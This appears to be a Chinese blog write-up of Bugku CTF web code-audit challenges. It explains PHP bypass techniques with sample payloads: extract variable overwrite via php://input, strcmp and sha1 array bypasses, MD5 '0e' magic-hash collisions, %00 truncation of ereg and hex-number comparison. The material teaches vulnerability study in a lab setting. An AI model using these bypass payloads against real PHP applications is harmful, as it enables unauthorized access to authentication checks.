bugctf web代码审计 writeup

最新推荐文章于 2025-05-14 00:40:16 发布
原创 最新推荐文章于 2025-05-14 00:40:16 发布 · 489 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文记录了一次CTF比赛中的web代码审计过程,详细介绍了extract变量覆盖、strcmp字符串比较、Urldecode二次编码、md5函数利用、弱类型整数大小比较、md5加密相等绕过、十六进制与数字比较、ereg正则截断和strpos数组绕过等技巧的应用,并给出了相关示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

把题目做完了,记录一下题解

extract变量覆盖

<?php
$flag='xxx';
extract($_GET);
if(isset($shiyan))
{
$content=trim(file_get_contents($flag));
if($shiyan==$content)
{
echo'flag{xxx}';
}
else
{
echo'Oh.no';
}
}
?>

http://123.206.87.240:9009/1.php?flag=NULL&shiyan=
Flag=php://input & shiyan  = 1 
POST 1

strcmp比较字符串

在Php 5.3以后
GET /6.php?a[]=1 
Strcmp比较数组和字符串的时候回返回0
就是和相等时一样的

Urldecode二次编码绕过

浏览器回进行一次urldecode所以要对hackerDJ进行两次urlencode

md5函数

  Md5三等号用数组绕过
    二等号用0e绕过


数组返回NULL绕过
先来谈论一下标准的答案:

第一个条件:
     必须以数字或者字母开头(其实看到ereg就可以想到%00截断)

第二个条件:
       必须在password参数中找到--。

所以得出以下正解:
  index.php?password=a%00--
    那么话又说回来了,为什么直接password[]=a就可以绕过呢?
    1.ereg只能处理字符,而你是数组,所以返回的是null,三个等号的时候不会进行类型转换。所以null不等于false。
    2.strpos的参数同样不能够是数组,所以返回的依旧是null,null不等于false也是正确。

弱类型整数大小比较绕过

解题思路:is_numeric()函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后。所以,查看函数发现该函数对于第一个空格字符会跳过空格字符判断,接着后面的判断
GET /22.php?password[]=23333  涉及到函数对数组的处理
GET /22.php?password=233333abc 涉及到类型转换
password=2345%00 涉及到截断
password=2345%20

sha()函数比较绕过
Sha()处理数组时候,回返回NULL,所以可以绕过===

name[]=123&password[]=1234

Md5加密相等绕过

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "flag{*}";
} else {
echo "false!!!";
}}
else{echo "please input a";}
?>


这个题目如果知道MD5碰撞的概念,同时知道了在PHP中的MD5中的0e的比较,这道题目就十分的简单。

如果md的值是以0e开头的,那么就与其他的0e开头的Md5值是相等的。例子如下:

md5('s878926199a')=0e545993274517709034328855841020
md5('s155964671a')=0e342768416822451524974117254469
//可以看到两者的md5值都是以0e开头的,则
md5('s878926199a')==md5('s155964671a') //就是True

详细解释:

php关于==号是这样处理的,如果一边是整型,另一边也需要是整型。

0e545993274517709034328855841020

这是一个整数,在php里是理解为0*10^4549...20的意思,那么其值是0

同样

0e342768416822451524974117254469

这是一个整数,在php里是理解为0*10^34..69的意思,那么其值是0

举一个反面的例子

1e1和1e2

1e1 == 1e2 这个结果是对是错?

这里1e1=1*10^1=10

1e2=1*10^2=100

所以1e1 == 1e2这是false,但是

100 == 1e2 这是true,为什么1e2先转为整型,是100

注意,对于e是指幂次。而其他26字符并不具有此能力。

十六进制与数字比较

首先分析代码,函数要求变量$temp不能存在1~9之间的数字,
最后,又要求$temp=3735929054;
这本来是自相矛盾的,但php在转码时会把16进制转化为十进制.于是把
3735929054转换成16进制为0xdeadc0de,记得带上0x;
构造payload

?password=0xdeadc0de

ereg正则截断

GET /5.php?password=1e9%00*-*
GET /5.php?password[]=1
原理测试代码
<?php
var_dump(strpos($_GET['password'],'-'));

var_dump(ereg ("^[a-zA-Z0-9]+$", $_GET['password'])); 

var_dump(NULL === FALSE);

?>

strpos数组绕过

Ctf[]=1
同样的套路(函数处理数组的问题

Ctf[]=1
同样的套路

[ 代码审计篇 ] Java web 代码审计 详解(一)
qq_51577576的博客
12-24 4375
Java web代码审计 第一篇 Java web代码审计 思路
Java代码审计技巧
悦分享
07-15 1551
自定义搜索范围示例:自定义搜索范围后就可以在搜索时使用自定义的配置进行范围搜索了,有助于我们在挖漏洞的时候缩小码定位范围。
WEB代码审计
12-05
一个关于代码审计的书,里面讲解的很详细,值得收藏,
PolarCTF WEB题目 代码审计1WP
weixin_62257805的博客
10-13 443
PolarCTF WEB题目 代码审计1WP
BUUCTF——杂项渗透之USB流量截取
最新发布
cai_huaer的博客
05-14 1102
但是,本题,由于他不是鼠标流量提取的,所以在进行第一步的时候,它生成的outm.txt没有任何内容,所以无法向下走下去,也就无法运行mouse2.py和mouse3.py了。运行后,将在终端中打印出flag。虽然键盘流量提取已经通过了,说明这题就是键盘流量提取,但是在这里,我也把鼠标流量提取记录一遍,以便以后的查询。不过此题,我用随波逐流没有解出来,他生成了下面三个文件,但是键盘的是空的txt,鼠标则是添加了冒号。,我尝试过,同样可以打印出flag,只是分步进行,容易查看出哪一步有问题,然后进行改正。
Ctfshow web入门 代码审计web301-web310 详细题解 全
Jay17的博客
09-21 3624
Ctfshow web入门 代码审计web301-web310 详细题解 全
CTFshow--Web--代码审计
pwfortune的博客
07-29 1854
service/service.php , 也存在 clearCache()的调用, 而且在logout.php里面require了service.php,查询不到内容, 会在数据库中创建一个数据 123 , 那么这个123就会作为一个返回的数据, 用以跟用户输入的密码进行比较 , 相匹配的话就行登录进去了。在index.php下面 ,能够调用 checkVersion()函数 , 虽然header 头跳转了,但是还是会执行后面的码。向服务端发送请求时,服务端会等待我们发送数据,处于wait状态。
Java Web代码审计
谢公子的博客
02-17 2104
Java Web代码审计基础 Java Web代码审计方法 Java Web脆弱性审计分析 输入输出数据验证 身份认证和访问控制 文件和资源管理 会话管理 错误和异常信息处理 数据安全 码质量 序列化 环境依赖 业务安全 ...
BugkuCTF(代码审计) WriteUp
CallMeSa1tyFish的博客
08-06 3828
代码审计部分 extract变量覆盖 题目 &amp;amp;amp;lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; }else{ ...
ctf线下赛mysql密码_CTF线下赛writeup&tinyblog代码审计
weixin_33982454的博客
02-01 477
前段时间参加了某次CTF线下赛,大多数比赛都是采用主流CMS系统,比如wordpress、pgpcms、dedecms等等,如果对主流CMS漏洞比较熟悉的话可以迅速定位漏洞,发起攻击。而这次比赛采用了小众自写CMS的方式,注重现场快速代码审计。本文将介绍CTF线下赛AWD模式的一些常见套路,以及对tinyblog的代码审计思路。预留后门比赛开始,一般比赛方为了比赛的观赏性,一般都会预留后门,这样场...
[Web安全 网络安全]-代码审计
刘鑫磊
11-04 1116
代码审计
web代码审计与渗透测试
08-22
代码审计,渗透测试,从原理上阐述码漏洞的原因,进而解释如何进行渗透测试
web渗透测试之代码审计
赤赤三的博客
03-21 3262
基本信息: 原理: 码安全测试是从安全的角度对码进行测试评估 结合丰富的安全知识、编程经验、测试技术,利用静态分析和人工审核的方法寻找码在架构和编码上的安全缺陷,在码形成软件前将业务安全降到最低 方式: 人工+工具双重审核 人工审核: 既能解决内部问题也能解决外部问题,最有效率的解决方案,理论上人工审核最有效,但是效率不高,所以会采用自动化分析工具辅助人工的方式来提供效率 静态分析工具: 通过一组全面规则、测试机制和方针在软件开发过程、测试过
CTFshow-WEB入门-代码审计
feng的博客
02-22 1822
前言 开始快乐的代码审计篇。 web301 源码下载下来分析一波,大部分都是无用的文件,主要还是在checklogin.php那里: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=$result->fetch_array(MYSQLI_BOTH); if($result->
CTF-代码审计-PHP
m0_74317362的博客
09-25 479
码复制到everedit中,可以看到乱码。要传参的变量名及其值都变了。
CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 587
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
Web方向】 PHP代码审计 CTF题目wp1
wanderer的博客
11-14 2057
好难的题!
ctfshow web入门(代码审计)
Blazing-Angel的博客
07-19 463
ctfshow
Web CTF代码审计学习笔记
彼岸花苏陌的博客
12-06 606
最近做了这么一个题,差点都蒙了 题目: <?php if (isset($_POST["login"])) { if (isset($_POST['yingzi'])) { if (preg_match("[a-zA-Z0-9]", $_POST['yingzi']) === FALSE) { exit('<script>alert("give you flag)")</script>'); } elseif (st
2019 ISCC CTF挑战:代码审计解密PHP脚本
在解决这个问题时,参赛者需要具备扎实的代码审计技能,包括但不限于识别潜在的漏洞、利用函数行为进行操作和理解输入验证机制。通过逐步调试和尝试不同的输入,他们可能会发现如何利用这个逻辑上的漏洞获取flag,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值